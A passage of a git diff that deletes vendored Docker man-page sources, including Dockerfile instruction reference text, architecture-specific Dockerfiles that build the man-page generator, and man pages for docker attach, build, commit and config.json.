This is different from the behavior of **CMD**. This allows - arguments to be passed to the entrypoint, for instance `docker run -d` - passes the -d argument to the **ENTRYPOINT**. Specify parameters either in the - **ENTRYPOINT** JSON array (as in the preferred exec form above), or by using a **CMD** - statement. Parameters in the **ENTRYPOINT** are not overwritten by the docker run - arguments. Parameters specified via **CMD** are overwritten by docker run - arguments. Specify a plain string for the **ENTRYPOINT**, and it will execute in - `/bin/sh -c`, like a **CMD** instruction: - - ``` - FROM ubuntu - ENTRYPOINT wc -l - - ``` - - This means that the Dockerfile's image always takes stdin as input (that's - what "-" means), and prints the number of lines (that's what "-l" means). To - make this optional but default, use a **CMD**: - - ``` - FROM ubuntu - CMD ["-l", "-"] - ENTRYPOINT ["/usr/bin/wc"] - ``` - -**VOLUME** - -- `VOLUME ["/data"]` - The **VOLUME** instruction creates a mount point with the specified name and marks - it as holding externally-mounted volumes from the native host or from other - containers. - -**USER** - -- `USER daemon` - Sets the username or UID used for running subsequent commands. - - The **USER** instruction can optionally be used to set the group or GID. The - followings examples are all valid: - USER [user | user:group | uid | uid:gid | user:gid | uid:group ] - - Until the **USER** instruction is set, instructions will be run as root. The USER - instruction can be used any number of times in a Dockerfile, and will only affect - subsequent commands. - -**WORKDIR** - -- `WORKDIR /path/to/workdir` - The **WORKDIR** instruction sets the working directory for the **RUN**, **CMD**, - **ENTRYPOINT**, **COPY** and **ADD** Dockerfile commands that follow it. It can - be used multiple times in a single Dockerfile. Relative paths are defined - relative to the path of the previous **WORKDIR** instruction. 
For example: - - ``` - WORKDIR /a - WORKDIR b - WORKDIR c - RUN pwd - ``` - - In the above example, the output of the **pwd** command is **a/b/c**. - -**ARG** - -- ARG [=] - - The `ARG` instruction defines a variable that users can pass at build-time to - the builder with the `docker build` command using the `--build-arg - =` flag. If a user specifies a build argument that was not - defined in the Dockerfile, the build outputs a warning. - - ``` - [Warning] One or more build-args [foo] were not consumed - ``` - - The Dockerfile author can define a single variable by specifying `ARG` once or many - variables by specifying `ARG` more than once. For example, a valid Dockerfile: - - ``` - FROM busybox - ARG user1 - ARG buildno - ... - ``` - - A Dockerfile author may optionally specify a default value for an `ARG` instruction: - - ``` - FROM busybox - ARG user1=someuser - ARG buildno=1 - ... - ``` - - If an `ARG` value has a default and if there is no value passed at build-time, the - builder uses the default. - - An `ARG` variable definition comes into effect from the line on which it is - defined in the `Dockerfile` not from the argument's use on the command-line or - elsewhere. For example, consider this Dockerfile: - - ``` - 1 FROM busybox - 2 USER ${user:-some_user} - 3 ARG user - 4 USER $user - ... - ``` - A user builds this file by calling: - - ``` - $ docker build --build-arg user=what_user Dockerfile - ``` - - The `USER` at line 2 evaluates to `some_user` as the `user` variable is defined on the - subsequent line 3. The `USER` at line 4 evaluates to `what_user` as `user` is - defined and the `what_user` value was passed on the command line. Prior to its definition by an - `ARG` instruction, any use of a variable results in an empty string. - - > **Warning:** It is not recommended to use build-time variables for - > passing secrets like github keys, user credentials etc. 
Build-time variable - > values are visible to any user of the image with the `docker history` command. - - You can use an `ARG` or an `ENV` instruction to specify variables that are - available to the `RUN` instruction. Environment variables defined using the - `ENV` instruction always override an `ARG` instruction of the same name. Consider - this Dockerfile with an `ENV` and `ARG` instruction. - - ``` - 1 FROM ubuntu - 2 ARG CONT_IMG_VER - 3 ENV CONT_IMG_VER v1.0.0 - 4 RUN echo $CONT_IMG_VER - ``` - Then, assume this image is built with this command: - - ``` - $ docker build --build-arg CONT_IMG_VER=v2.0.1 Dockerfile - ``` - - In this case, the `RUN` instruction uses `v1.0.0` instead of the `ARG` setting - passed by the user:`v2.0.1` This behavior is similar to a shell - script where a locally scoped variable overrides the variables passed as - arguments or inherited from environment, from its point of definition. - - Using the example above but a different `ENV` specification you can create more - useful interactions between `ARG` and `ENV` instructions: - - ``` - 1 FROM ubuntu - 2 ARG CONT_IMG_VER - 3 ENV CONT_IMG_VER ${CONT_IMG_VER:-v1.0.0} - 4 RUN echo $CONT_IMG_VER - ``` - - Unlike an `ARG` instruction, `ENV` values are always persisted in the built - image. Consider a docker build without the --build-arg flag: - - ``` - $ docker build Dockerfile - ``` - - Using this Dockerfile example, `CONT_IMG_VER` is still persisted in the image but - its value would be `v1.0.0` as it is the default set in line 3 by the `ENV` instruction. - - The variable expansion technique in this example allows you to pass arguments - from the command line and persist them in the final image by leveraging the - `ENV` instruction. Variable expansion is only supported for [a limited set of - Dockerfile instructions.](#environment-replacement) - - Docker has a set of predefined `ARG` variables that you can use without a - corresponding `ARG` instruction in the Dockerfile. 
- - * `HTTP_PROXY` - * `http_proxy` - * `HTTPS_PROXY` - * `https_proxy` - * `FTP_PROXY` - * `ftp_proxy` - * `NO_PROXY` - * `no_proxy` - - To use these, simply pass them on the command line using the `--build-arg - =` flag. - -**ONBUILD** - -- `ONBUILD [INSTRUCTION]` - The **ONBUILD** instruction adds a trigger instruction to an image. The - trigger is executed at a later time, when the image is used as the base for - another build. Docker executes the trigger in the context of the downstream - build, as if the trigger existed immediately after the **FROM** instruction in - the downstream Dockerfile. - - You can register any build instruction as a trigger. A trigger is useful if - you are defining an image to use as a base for building other images. For - example, if you are defining an application build environment or a daemon that - is customized with a user-specific configuration. - - Consider an image intended as a reusable python application builder. It must - add application source code to a particular directory, and might need a build - script called after that. You can't just call **ADD** and **RUN** now, because - you don't yet have access to the application source code, and it is different - for each application build. - - -- Providing application developers with a boilerplate Dockerfile to copy-paste - into their application is inefficient, error-prone, and - difficult to update because it mixes with application-specific code. - The solution is to use **ONBUILD** to register instructions in advance, to - run later, during the next build stage. - -# HISTORY -*May 2014, Compiled by Zac Dover (zdover at redhat dot com) based on docker.com Dockerfile documentation. 
-*Feb 2015, updated by Brian Goff (cpuguy83@gmail.com) for readability -*Sept 2015, updated by Sally O'Malley (somalley@redhat.com) -*Oct 2016, updated by Addam Hardy (addam.hardy@gmail.com) diff --git a/vendor/github.com/docker/docker/man/Dockerfile.aarch64 b/vendor/github.com/docker/docker/man/Dockerfile.aarch64 deleted file mode 100644 index e788eb1c1d..0000000000 --- a/vendor/github.com/docker/docker/man/Dockerfile.aarch64 +++ /dev/null @@ -1,25 +0,0 @@ -FROM aarch64/ubuntu:xenial - -RUN apt-get update && apt-get install -y git golang-go - -RUN mkdir -p /go/src /go/bin /go/pkg -ENV GOPATH=/go -RUN export GLIDE=v0.11.1; \ - export TARGET=/go/src/github.com/Masterminds; \ - mkdir -p ${TARGET} && \ - git clone https://github.com/Masterminds/glide.git ${TARGET}/glide && \ - cd ${TARGET}/glide && \ - git checkout $GLIDE && \ - make build && \ - cp ./glide /usr/bin/glide && \ - cd / && rm -rf /go/src/* /go/bin/* /go/pkg/* - -COPY glide.yaml /manvendor/ -COPY glide.lock /manvendor/ -WORKDIR /manvendor/ -RUN glide install && mv vendor src -ENV GOPATH=$GOPATH:/manvendor -RUN go build -o /usr/bin/go-md2man github.com/cpuguy83/go-md2man - -WORKDIR /go/src/github.com/docker/docker/ -ENTRYPOINT ["man/generate.sh"] diff --git a/vendor/github.com/docker/docker/man/Dockerfile.armhf b/vendor/github.com/docker/docker/man/Dockerfile.armhf deleted file mode 100644 index e7ea495646..0000000000 --- a/vendor/github.com/docker/docker/man/Dockerfile.armhf +++ /dev/null @@ -1,43 +0,0 @@ -FROM armhf/debian:jessie - -# allow replacing httpredir or deb mirror -ARG APT_MIRROR=deb.debian.org -RUN sed -ri "s/(httpredir|deb).debian.org/$APT_MIRROR/g" /etc/apt/sources.list - -RUN apt-get update && apt-get install -y \ - git \ - bash \ - curl \ - gcc \ - make - -ENV GO_VERSION 1.7.5 -RUN curl -fsSL "https://golang.org/dl/go${GO_VERSION}.linux-armv6l.tar.gz" \ - | tar -xzC /usr/local -ENV PATH /go/bin:/usr/local/go/bin:$PATH -ENV GOPATH /go - -# We're building for armhf, which is ARMv7, so let's 
be explicit about that -ENV GOARCH arm -ENV GOARM 7 - -RUN mkdir -p /go/src /go/bin /go/pkg -RUN export GLIDE=v0.11.1; \ - export TARGET=/go/src/github.com/Masterminds; \ - mkdir -p ${TARGET} && \ - git clone https://github.com/Masterminds/glide.git ${TARGET}/glide && \ - cd ${TARGET}/glide && \ - git checkout $GLIDE && \ - make build && \ - cp ./glide /usr/bin/glide && \ - cd / && rm -rf /go/src/* /go/bin/* /go/pkg/* - -COPY glide.yaml /manvendor/ -COPY glide.lock /manvendor/ -WORKDIR /manvendor/ -RUN glide install && mv vendor src -ENV GOPATH=$GOPATH:/manvendor -RUN go build -o /usr/bin/go-md2man github.com/cpuguy83/go-md2man - -WORKDIR /go/src/github.com/docker/docker/ -ENTRYPOINT ["man/generate.sh"] diff --git a/vendor/github.com/docker/docker/man/Dockerfile.ppc64le b/vendor/github.com/docker/docker/man/Dockerfile.ppc64le deleted file mode 100644 index fc96ca7691..0000000000 --- a/vendor/github.com/docker/docker/man/Dockerfile.ppc64le +++ /dev/null @@ -1,35 +0,0 @@ -FROM ppc64le/ubuntu:xenial - -RUN apt-get update && apt-get install -y \ - curl \ - gcc \ - git \ - make \ - tar - -ENV GO_VERSION 1.7.5 -RUN curl -fsSL "https://golang.org/dl/go${GO_VERSION}.linux-ppc64le.tar.gz" \ - | tar -xzC /usr/local -ENV PATH /usr/local/go/bin:$PATH -ENV GOPATH=/go - -RUN mkdir -p /go/src /go/bin /go/pkg -RUN export GLIDE=v0.11.1; \ - export TARGET=/go/src/github.com/Masterminds; \ - mkdir -p ${TARGET} && \ - git clone https://github.com/Masterminds/glide.git ${TARGET}/glide && \ - cd ${TARGET}/glide && \ - git checkout $GLIDE && \ - make build && \ - cp ./glide /usr/bin/glide && \ - cd / && rm -rf /go/src/* /go/bin/* /go/pkg/* - -COPY glide.yaml /manvendor/ -COPY glide.lock /manvendor/ -WORKDIR /manvendor/ -RUN glide install && mv vendor src -ENV GOPATH=$GOPATH:/manvendor -RUN go build -o /usr/bin/go-md2man github.com/cpuguy83/go-md2man - -WORKDIR /go/src/github.com/docker/docker/ -ENTRYPOINT ["man/generate.sh"] diff --git 
a/vendor/github.com/docker/docker/man/Dockerfile.s390x b/vendor/github.com/docker/docker/man/Dockerfile.s390x deleted file mode 100644 index d4bcf1da11..0000000000 --- a/vendor/github.com/docker/docker/man/Dockerfile.s390x +++ /dev/null @@ -1,35 +0,0 @@ -FROM s390x/ubuntu:xenial - -RUN apt-get update && apt-get install -y \ - curl \ - gcc \ - git \ - make \ - tar - -ENV GO_VERSION 1.7.5 -RUN curl -fsSL "https://golang.org/dl/go${GO_VERSION}.linux-s390x.tar.gz" \ - | tar -xzC /usr/local -ENV PATH /usr/local/go/bin:$PATH -ENV GOPATH=/go - -RUN mkdir -p /go/src /go/bin /go/pkg -RUN export GLIDE=v0.11.1; \ - export TARGET=/go/src/github.com/Masterminds; \ - mkdir -p ${TARGET} && \ - git clone https://github.com/Masterminds/glide.git ${TARGET}/glide && \ - cd ${TARGET}/glide && \ - git checkout $GLIDE && \ - make build && \ - cp ./glide /usr/bin/glide && \ - cd / && rm -rf /go/src/* /go/bin/* /go/pkg/* - -COPY glide.yaml /manvendor/ -COPY glide.lock /manvendor/ -WORKDIR /manvendor/ -RUN glide install && mv vendor src -ENV GOPATH=$GOPATH:/manvendor -RUN go build -o /usr/bin/go-md2man github.com/cpuguy83/go-md2man - -WORKDIR /go/src/github.com/docker/docker/ -ENTRYPOINT ["man/generate.sh"] diff --git a/vendor/github.com/docker/docker/man/README.md b/vendor/github.com/docker/docker/man/README.md deleted file mode 100644 index 82dac650f9..0000000000 --- a/vendor/github.com/docker/docker/man/README.md +++ /dev/null @@ -1,15 +0,0 @@ -Docker Documentation -==================== - -This directory contains scripts for generating the man pages. Many of the man -pages are generated directly from the `spf13/cobra` `Command` definition. Some -legacy pages are still generated from the markdown files in this directory. -Do *not* edit the man pages in the man1 directory. Instead, update the -Cobra command or amend the Markdown files for legacy pages. 
- - -## Generate the man pages - -From within the project root directory run: - - make manpages diff --git a/vendor/github.com/docker/docker/man/docker-attach.1.md b/vendor/github.com/docker/docker/man/docker-attach.1.md deleted file mode 100644 index c39d1c9290..0000000000 --- a/vendor/github.com/docker/docker/man/docker-attach.1.md +++ /dev/null @@ -1,99 +0,0 @@ -% DOCKER(1) Docker User Manuals -% Docker Community -% JUNE 2014 -# NAME -docker-attach - Attach to a running container - -# SYNOPSIS -**docker attach** -[**--detach-keys**[=*[]*]] -[**--help**] -[**--no-stdin**] -[**--sig-proxy**[=*true*]] -CONTAINER - -# DESCRIPTION -The **docker attach** command allows you to attach to a running container using -the container's ID or name, either to view its ongoing output or to control it -interactively. You can attach to the same contained process multiple times -simultaneously, screen sharing style, or quickly view the progress of your -detached process. - -To stop a container, use `CTRL-c`. This key sequence sends `SIGKILL` to the -container. You can detach from the container (and leave it running) using a -configurable key sequence. The default sequence is `CTRL-p CTRL-q`. You -configure the key sequence using the **--detach-keys** option or a configuration -file. See **config-json(5)** for documentation on using a configuration file. - -It is forbidden to redirect the standard input of a `docker attach` command while -attaching to a tty-enabled container (i.e.: launched with `-t`). - -# OPTIONS -**--detach-keys**="" - Override the key sequence for detaching a container. Format is a single character `[a-Z]` or `ctrl-` where `` is one of: `a-z`, `@`, `^`, `[`, `,` or `_`. - -**--help** - Print usage statement - -**--no-stdin**=*true*|*false* - Do not attach STDIN. The default is *false*. - -**--sig-proxy**=*true*|*false* - Proxy all received signals to the process (non-TTY mode only). SIGCHLD, SIGKILL, and SIGSTOP are not proxied. The default is *true*. 
- -# Override the detach sequence - -If you want, you can configure an override the Docker key sequence for detach. -This is useful if the Docker default sequence conflicts with key sequence you -use for other applications. There are two ways to define your own detach key -sequence, as a per-container override or as a configuration property on your -entire configuration. - -To override the sequence for an individual container, use the -`--detach-keys=""` flag with the `docker attach` command. The format of -the `` is either a letter [a-Z], or the `ctrl-` combined with any of -the following: - -* `a-z` (a single lowercase alpha character ) -* `@` (at sign) -* `[` (left bracket) -* `\\` (two backward slashes) -* `_` (underscore) -* `^` (caret) - -These `a`, `ctrl-a`, `X`, or `ctrl-\\` values are all examples of valid key -sequences. To configure a different configuration default key sequence for all -containers, see **docker(1)**. - -# EXAMPLES - -## Attaching to a container - -In this example the top command is run inside a container, from an image called -fedora, in detached mode. 
The ID from the container is passed into the **docker -attach** command: - - # ID=$(sudo docker run -d fedora /usr/bin/top -b) - # sudo docker attach $ID - top - 02:05:52 up 3:05, 0 users, load average: 0.01, 0.02, 0.05 - Tasks: 1 total, 1 running, 0 sleeping, 0 stopped, 0 zombie - Cpu(s): 0.1%us, 0.2%sy, 0.0%ni, 99.7%id, 0.0%wa, 0.0%hi, 0.0%si, 0.0%st - Mem: 373572k total, 355560k used, 18012k free, 27872k buffers - Swap: 786428k total, 0k used, 786428k free, 221740k cached - - PID USER PR NI VIRT RES SHR S %CPU %MEM TIME+ COMMAND - 1 root 20 0 17200 1116 912 R 0 0.3 0:00.03 top - - top - 02:05:55 up 3:05, 0 users, load average: 0.01, 0.02, 0.05 - Tasks: 1 total, 1 running, 0 sleeping, 0 stopped, 0 zombie - Cpu(s): 0.0%us, 0.2%sy, 0.0%ni, 99.8%id, 0.0%wa, 0.0%hi, 0.0%si, 0.0%st - Mem: 373572k total, 355244k used, 18328k free, 27872k buffers - Swap: 786428k total, 0k used, 786428k free, 221776k cached - - PID USER PR NI VIRT RES SHR S %CPU %MEM TIME+ COMMAND - 1 root 20 0 17208 1144 932 R 0 0.3 0:00.03 top - -# HISTORY -April 2014, Originally compiled by William Henry (whenry at redhat dot com) -based on docker.com source material and internal work. 
-June 2014, updated by Sven Dowideit diff --git a/vendor/github.com/docker/docker/man/docker-build.1.md b/vendor/github.com/docker/docker/man/docker-build.1.md deleted file mode 100644 index 4beee88e4a..0000000000 --- a/vendor/github.com/docker/docker/man/docker-build.1.md +++ /dev/null @@ -1,340 +0,0 @@ -% DOCKER(1) Docker User Manuals -% Docker Community -% JUNE 2014 -# NAME -docker-build - Build an image from a Dockerfile - -# SYNOPSIS -**docker build** -[**--build-arg**[=*[]*]] -[**--cpu-shares**[=*0*]] -[**--cgroup-parent**[=*CGROUP-PARENT*]] -[**--help**] -[**-f**|**--file**[=*PATH/Dockerfile*]] -[**-squash**] *Experimental* -[**--force-rm**] -[**--isolation**[=*default*]] -[**--label**[=*[]*]] -[**--no-cache**] -[**--pull**] -[**--compress**] -[**-q**|**--quiet**] -[**--rm**[=*true*]] -[**-t**|**--tag**[=*[]*]] -[**-m**|**--memory**[=*MEMORY*]] -[**--memory-swap**[=*LIMIT*]] -[**--network**[=*"default"*]] -[**--shm-size**[=*SHM-SIZE*]] -[**--cpu-period**[=*0*]] -[**--cpu-quota**[=*0*]] -[**--cpuset-cpus**[=*CPUSET-CPUS*]] -[**--cpuset-mems**[=*CPUSET-MEMS*]] -[**--ulimit**[=*[]*]] -PATH | URL | - - -# DESCRIPTION -This will read the Dockerfile from the directory specified in **PATH**. -It also sends any other files and directories found in the current -directory to the Docker daemon. The contents of this directory would -be used by **ADD** commands found within the Dockerfile. - -Warning, this will send a lot of data to the Docker daemon depending -on the contents of the current directory. The build is run by the Docker -daemon, not by the CLI, so the whole context must be transferred to the daemon. -The Docker CLI reports "Sending build context to Docker daemon" when the context is sent to -the daemon. - -When the URL to a tarball archive or to a single Dockerfile is given, no context is sent from -the client to the Docker daemon. In this case, the Dockerfile at the root of the archive and -the rest of the archive will get used as the context of the build. 
When a Git repository is -set as the **URL**, the repository is cloned locally and then sent as the context. - -# OPTIONS -**-f**, **--file**=*PATH/Dockerfile* - Path to the Dockerfile to use. If the path is a relative path and you are - building from a local directory, then the path must be relative to that - directory. If you are building from a remote URL pointing to either a - tarball or a Git repository, then the path must be relative to the root of - the remote context. In all cases, the file must be within the build context. - The default is *Dockerfile*. - -**--squash**=*true*|*false* - **Experimental Only** - Once the image is built, squash the new layers into a new image with a single - new layer. Squashing does not destroy any existing image, rather it creates a new - image with the content of the squshed layers. This effectively makes it look - like all `Dockerfile` commands were created with a single layer. The build - cache is preserved with this method. - - **Note**: using this option means the new image will not be able to take - advantage of layer sharing with other images and may use significantly more - space. - - **Note**: using this option you may see significantly more space used due to - storing two copies of the image, one for the build cache with all the cache - layers in tact, and one for the squashed version. - -**--build-arg**=*variable* - name and value of a **buildarg**. - - For example, if you want to pass a value for `http_proxy`, use - `--build-arg=http_proxy="http://some.proxy.url"` - - Users pass these values at build-time. Docker uses the `buildargs` as the - environment context for command(s) run via the Dockerfile's `RUN` instruction - or for variable expansion in other Dockerfile instructions. This is not meant - for passing secret values. 
[Read more about the buildargs instruction](https://docs.docker.com/engine/reference/builder/#arg) - -**--force-rm**=*true*|*false* - Always remove intermediate containers, even after unsuccessful builds. The default is *false*. - -**--isolation**="*default*" - Isolation specifies the type of isolation technology used by containers. - -**--label**=*label* - Set metadata for an image - -**--no-cache**=*true*|*false* - Do not use cache when building the image. The default is *false*. - -**--help** - Print usage statement - -**--pull**=*true*|*false* - Always attempt to pull a newer version of the image. The default is *false*. - -**--compress**=*true*|*false* - Compress the build context using gzip. The default is *false*. - -**-q**, **--quiet**=*true*|*false* - Suppress the build output and print image ID on success. The default is *false*. - -**--rm**=*true*|*false* - Remove intermediate containers after a successful build. The default is *true*. - -**-t**, **--tag**="" - Repository names (and optionally with tags) to be applied to the resulting - image in case of success. Refer to **docker-tag(1)** for more information - about valid tag names. - -**-m**, **--memory**=*MEMORY* - Memory limit - -**--memory-swap**=*LIMIT* - A limit value equal to memory plus swap. Must be used with the **-m** -(**--memory**) flag. The swap `LIMIT` should always be larger than **-m** -(**--memory**) value. - - The format of `LIMIT` is `[]`. Unit can be `b` (bytes), -`k` (kilobytes), `m` (megabytes), or `g` (gigabytes). If you don't specify a -unit, `b` is used. Set LIMIT to `-1` to enable unlimited swap. - -**--network**=*bridge* - Set the networking mode for the RUN instructions during build. Supported standard - values are: `bridge`, `host`, `none` and `container:`. Any other value - is taken as a custom network's name or ID which this container should connect to. - -**--shm-size**=*SHM-SIZE* - Size of `/dev/shm`. The format is ``. `number` must be greater than `0`. 
- Unit is optional and can be `b` (bytes), `k` (kilobytes), `m` (megabytes), or `g` (gigabytes). If you omit the unit, the system uses bytes. - If you omit the size entirely, the system uses `64m`. - -**--cpu-shares**=*0* - CPU shares (relative weight). - - By default, all containers get the same proportion of CPU cycles. - CPU shares is a 'relative weight', relative to the default setting of 1024. - This default value is defined here: - ``` - cat /sys/fs/cgroup/cpu/cpu.shares - 1024 - ``` - You can change this proportion by adjusting the container's CPU share - weighting relative to the weighting of all other running containers. - - To modify the proportion from the default of 1024, use the **--cpu-shares** - flag to set the weighting to 2 or higher. - - Container CPU share Flag - {C0} 60% of CPU --cpu-shares=614 (614 is 60% of 1024) - {C1} 40% of CPU --cpu-shares=410 (410 is 40% of 1024) - - The proportion is only applied when CPU-intensive processes are running. - When tasks in one container are idle, the other containers can use the - left-over CPU time. The actual amount of CPU time used varies depending on - the number of containers running on the system. - - For example, consider three containers, where one has **--cpu-shares=1024** and - two others have **--cpu-shares=512**. When processes in all three - containers attempt to use 100% of CPU, the first container would receive - 50% of the total CPU time. If you add a fourth container with **--cpu-shares=1024**, - the first container only gets 33% of the CPU. The remaining containers - receive 16.5%, 16.5% and 33% of the CPU. - - - Container CPU share Flag CPU time - {C0} 100% --cpu-shares=1024 33% - {C1} 50% --cpu-shares=512 16.5% - {C2} 50% --cpu-shares=512 16.5% - {C4} 100% --cpu-shares=1024 33% - - - On a multi-core system, the shares of CPU time are distributed across the CPU - cores. Even if a container is limited to less than 100% of CPU time, it can - use 100% of each individual CPU core. 
- - For example, consider a system with more than three cores. If you start one - container **{C0}** with **--cpu-shares=512** running one process, and another container - **{C1}** with **--cpu-shares=1024** running two processes, this can result in the following - division of CPU shares: - - PID container CPU CPU share - 100 {C0} 0 100% of CPU0 - 101 {C1} 1 100% of CPU1 - 102 {C1} 2 100% of CPU2 - -**--cpu-period**=*0* - Limit the CPU CFS (Completely Fair Scheduler) period. - - Limit the container's CPU usage. This flag causes the kernel to restrict the - container's CPU usage to the period you specify. - -**--cpu-quota**=*0* - Limit the CPU CFS (Completely Fair Scheduler) quota. - - By default, containers run with the full CPU resource. This flag causes the -kernel to restrict the container's CPU usage to the quota you specify. - -**--cpuset-cpus**=*CPUSET-CPUS* - CPUs in which to allow execution (0-3, 0,1). - -**--cpuset-mems**=*CPUSET-MEMS* - Memory nodes (MEMs) in which to allow execution (0-3, 0,1). Only effective on - NUMA systems. - - For example, if you have four memory nodes on your system (0-3), use `--cpuset-mems=0,1` -to ensure the processes in your Docker container only use memory from the first -two memory nodes. - -**--cgroup-parent**=*CGROUP-PARENT* - Path to `cgroups` under which the container's `cgroup` are created. - - If the path is not absolute, the path is considered relative to the `cgroups` path of the init process. -Cgroups are created if they do not already exist. - -**--ulimit**=[] - Ulimit options - - For more information about `ulimit` see [Setting ulimits in a -container](https://docs.docker.com/engine/reference/commandline/run/#set-ulimits-in-container---ulimit) - -# EXAMPLES - -## Building an image using a Dockerfile located inside the current directory - -Docker images can be built using the build command and a Dockerfile: - - docker build . - -During the build process Docker creates intermediate images. 
In order to -keep them, you must explicitly set `--rm=false`. - - docker build --rm=false . - -A good practice is to make a sub-directory with a related name and create -the Dockerfile in that directory. For example, a directory called mongo may -contain a Dockerfile to create a Docker MongoDB image. Likewise, another -directory called httpd may be used to store Dockerfiles for Apache web -server images. - -It is also a good practice to add the files required for the image to the -sub-directory. These files will then be specified with the `COPY` or `ADD` -instructions in the `Dockerfile`. - -Note: If you include a tar file (a good practice), then Docker will -automatically extract the contents of the tar file specified within the `ADD` -instruction into the specified target. - -## Building an image and naming that image - -A good practice is to give a name to the image you are building. Note that -only a-z0-9-_. should be used for consistency. There are no hard rules here but it is best to give the names consideration. - -The **-t**/**--tag** flag is used to rename an image. Here are some examples: - -Though it is not a good practice, image names can be arbitrary: - - docker build -t myimage . - -A better approach is to provide a fully qualified and meaningful repository, -name, and tag (where the tag in this context means the qualifier after -the ":"). In this example we build a JBoss image for the Fedora repository -and give it the version 1.0: - - docker build -t fedora/jboss:1.0 . - -The next example is for the "whenry" user repository and uses Fedora and -JBoss and gives it the version 2.1 : - - docker build -t whenry/fedora-jboss:v2.1 . - -If you do not provide a version tag then Docker will assign `latest`: - - docker build -t whenry/fedora-jboss . - -When you list the images, the image above will have the tag `latest`. - -You can apply multiple tags to an image. 
For example, you can apply the `latest` -tag to a newly built image and add another tag that references a specific -version. -For example, to tag an image both as `whenry/fedora-jboss:latest` and -`whenry/fedora-jboss:v2.1`, use the following: - - docker build -t whenry/fedora-jboss:latest -t whenry/fedora-jboss:v2.1 . - -So renaming an image is arbitrary but consideration should be given to -a useful convention that makes sense for consumers and should also take -into account Docker community conventions. - - -## Building an image using a URL - -This will clone the specified GitHub repository from the URL and use it -as context. The Dockerfile at the root of the repository is used as -Dockerfile. This only works if the GitHub repository is a dedicated -repository. - - docker build github.com/scollier/purpletest - -Note: You can set an arbitrary Git repository via the `git://` scheme. - -## Building an image using a URL to a tarball'ed context - -This will send the URL itself to the Docker daemon. The daemon will fetch the -tarball archive, decompress it and use its contents as the build context. The -Dockerfile at the root of the archive and the rest of the archive will get used -as the context of the build. If you pass an **-f PATH/Dockerfile** option as well, -the system will look for that file inside the contents of the tarball. - - docker build -f dev/Dockerfile https://10.10.10.1/docker/context.tar.gz - -Note: supported compression formats are 'xz', 'bzip2', 'gzip' and 'identity' (no compression). - -## Specify isolation technology for container (--isolation) - -This option is useful in situations where you are running Docker containers on -Windows. The `--isolation=` option sets a container's isolation -technology. On Linux, the only supported is the `default` option which uses -Linux namespaces. On Microsoft Windows, you can specify these values: - -* `default`: Use the value specified by the Docker daemon's `--exec-opt` . 
If the `daemon` does not specify an isolation technology, Microsoft Windows uses `process` as its default value. -* `process`: Namespace isolation only. -* `hyperv`: Hyper-V hypervisor partition-based isolation. - -Specifying the `--isolation` flag without a value is the same as setting `--isolation="default"`. - -# HISTORY -March 2014, Originally compiled by William Henry (whenry at redhat dot com) -based on docker.com source material and internal work. -June 2014, updated by Sven Dowideit -June 2015, updated by Sally O'Malley diff --git a/vendor/github.com/docker/docker/man/docker-commit.1.md b/vendor/github.com/docker/docker/man/docker-commit.1.md deleted file mode 100644 index d8a4cf8387..0000000000 --- a/vendor/github.com/docker/docker/man/docker-commit.1.md +++ /dev/null @@ -1,71 +0,0 @@ -% DOCKER(1) Docker User Manuals -% Docker Community -% JUNE 2014 -# NAME -docker-commit - Create a new image from a container's changes - -# SYNOPSIS -**docker commit** -[**-a**|**--author**[=*AUTHOR*]] -[**-c**|**--change**[=\[*DOCKERFILE INSTRUCTIONS*\]]] -[**--help**] -[**-m**|**--message**[=*MESSAGE*]] -[**-p**|**--pause**[=*true*]] -CONTAINER [REPOSITORY[:TAG]] - -# DESCRIPTION -Create a new image from an existing container specified by name or -container ID. The new image will contain the contents of the -container filesystem, *excluding* any data volumes. Refer to **docker-tag(1)** -for more information about valid image and tag names. - -While the `docker commit` command is a convenient way of extending an -existing image, you should prefer the use of a Dockerfile and `docker -build` for generating images that you intend to share with other -people. 
- -# OPTIONS -**-a**, **--author**="" - Author (e.g., "John Hannibal Smith ") - -**-c** , **--change**=[] - Apply specified Dockerfile instructions while committing the image - Supported Dockerfile instructions: `CMD`|`ENTRYPOINT`|`ENV`|`EXPOSE`|`LABEL`|`ONBUILD`|`USER`|`VOLUME`|`WORKDIR` - -**--help** - Print usage statement - -**-m**, **--message**="" - Commit message - -**-p**, **--pause**=*true*|*false* - Pause container during commit. The default is *true*. - -# EXAMPLES - -## Creating a new image from an existing container -An existing Fedora based container has had Apache installed while running -in interactive mode with the bash shell. Apache is also running. To -create a new image run `docker ps` to find the container's ID and then run: - - # docker commit -m="Added Apache to Fedora base image" \ - -a="A D Ministrator" 98bd7fc99854 fedora/fedora_httpd:20 - -Note that only a-z0-9-_. are allowed when naming images from an -existing container. - -## Apply specified Dockerfile instructions while committing the image -If an existing container was created without the DEBUG environment -variable set to "true", you can create a new image based on that -container by first getting the container's ID with `docker ps` and -then running: - - # docker commit -c="ENV DEBUG true" 98bd7fc99854 debug-image - -# HISTORY -April 2014, Originally compiled by William Henry (whenry at redhat dot com) -based on docker.com source material and in -June 2014, updated by Sven Dowideit -July 2014, updated by Sven Dowideit -Oct 2014, updated by Daniel, Dao Quang Minh -June 2015, updated by Sally O'Malley diff --git a/vendor/github.com/docker/docker/man/docker-config-json.5.md b/vendor/github.com/docker/docker/man/docker-config-json.5.md deleted file mode 100644 index 49987f08b8..0000000000 --- a/vendor/github.com/docker/docker/man/docker-config-json.5.md +++ /dev/null @@ -1,72 +0,0 @@ -% CONFIG.JSON(5) Docker User Manuals -% Docker Community -% JANUARY 2016 -# NAME 
-HOME/.docker/config.json - Default Docker configuration file - -# INTRODUCTION - -By default, the Docker command line stores its configuration files in a -directory called `.docker` within your `$HOME` directory. Docker manages most of -the files in the configuration directory and you should not modify them. -However, you *can modify* the `config.json` file to control certain aspects of -how the `docker` command behaves. - -Currently, you can modify the `docker` command behavior using environment -variables or command-line options. You can also use options within -`config.json` to modify some of the same behavior. When using these -mechanisms, you must keep in mind the order of precedence among them. Command -line options override environment variables and environment variables override -properties you specify in a `config.json` file. - -The `config.json` file stores a JSON encoding of several properties: - -* The `HttpHeaders` property specifies a set of headers to include in all messages -sent from the Docker client to the daemon. Docker does not try to interpret or -understand these header; it simply puts them into the messages. Docker does not -allow these headers to change any headers it sets for itself. - -* The `psFormat` property specifies the default format for `docker ps` output. -When the `--format` flag is not provided with the `docker ps` command, -Docker's client uses this property. If this property is not set, the client -falls back to the default table format. For a list of supported formatting -directives, see **docker-ps(1)**. - -* The `detachKeys` property specifies the default key sequence which -detaches the container. When the `--detach-keys` flag is not provide -with the `docker attach`, `docker exec`, `docker run` or `docker -start`, Docker's client uses this property. If this property is not 